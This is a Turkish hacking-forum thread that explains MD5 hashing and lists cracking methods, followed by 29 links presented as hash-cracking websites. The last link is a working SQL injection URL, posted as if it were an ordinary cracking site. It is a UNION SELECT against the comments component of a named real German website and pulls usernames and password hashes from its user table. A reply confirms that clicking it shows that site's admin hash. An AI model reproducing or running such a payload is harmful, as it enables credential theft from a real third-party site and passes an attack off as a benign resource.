Md5 serverlar

bLoOdLusT1912

Kadim Üye
1 Ağu 2007
5,470
41
Açılımı Message Digest 5 olan Md5 MD5, sonsuz uzunlukta veriyi girdi olarak kabul edebilir.MD5 forum üyelik sistemlerinde,portallarda ve üye girişi yapılan yerlerde kullanılır.Tek yönlü bir algoritması olduğu için siz forumda şifrenizi unuttuğunuzda size geri göndermelerini istediğiniz zaman şifrenizi geri gönderemezler.Şifrenize reset atabilir ve yeni şifre oluşturmanızı sağlarlar.
Üyelik sistemlerinde ise ilk login olduğunuzda Usernameiniz ve Şifrenizin md5 hashli hali databasede saklanır.Bundan sonraki her girişinizde siz şifrenizi yazarsınız,sistem şifrenizi hashler ve databasedeki ile tutup tutmadıgını kontrol eder.MD5 hashleri 32 karakterden oluşur.30 hanelik şifrenizde hashlendiğinde 5 hanelik şifrenizde hashlendiğinde 32 karakter olur.
Md5 Hash Kırma Yöntemleri :
  • Wordlist Atak
  • Brute-Force(Deneme Yanılma) Atak
  • Rainbow Table yardımıyla
Bu yöntemleri gerçekleştirmek üzere sizler için bazı siteler buldum.Tüm siteleri kendim buldum.üzerlerinde hiçbir oynama yapmadım.Md5'lerin hepsi kırılcak diye bi kurar yoktur.Bu yüzden bunlar işe yaramaz niye verdin bize bunları demiceğinizi temenni ediyorm.En azından yeni başlayn arkadaşlar için bir ön çalışma olur...
Siteler :

1. TIKLAYINIZ
  2. TIKLAYINIZ
  3. TIKLAYINIZ
  4. TIKLAYINIZ
  5. TIKLAYINIZ
  6. TIKLAYINIZ
  7. TIKLAYINIZ
  8. TIKLAYINIZ
  9. TIKLAYINIZ
  10. TIKLAYINIZ
  11. TIKLAYINIZ
  12. TIKLAYINIZ
  13. TIKLAYINIZ
  14. TIKLAYINIZ
  15. TIKLAYINIZ
  16. TIKLAYINIZ
  17. TIKLAYINIZ
  18. TIKLAYINIZ
  19. TIKLAYINIZ
  20. TIKLAYINIZ
  21. TIKLAYINIZ
  22. TIKLAYINIZ
  23. TIKLAYINIZ
  24. TIKLAYINIZ
  25. TIKLAYINIZ
  26. TIKLAYINIZ
  27. TIKLAYINIZ
  28. TIKLAYINIZ
  29. http://www.m%C3%83%C2%A4hrlein.de/index.php?option=com_comments&task=view&id=-1+UNION+SELECT+0,999999,concat%28username,0x3a,PASSWORD%29,0,0,0,0,0,0+FROM+mos_users+union+select+*+from+mos_content_comments+where+1=1TIKLAYINIZ[/URL]
Dip Not : Forum temizliği açısından Linkleri Gizledim.Umarım işinize yarar.Kolay gelsin ;)

areasa

Üye
19 Ocak 2008
101
0
abi bunlar ne ya tıladığım sitenin admin hash gelıor sen burayı gövde gösterisi zannettin herhalde :)

Son düzenleme:

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.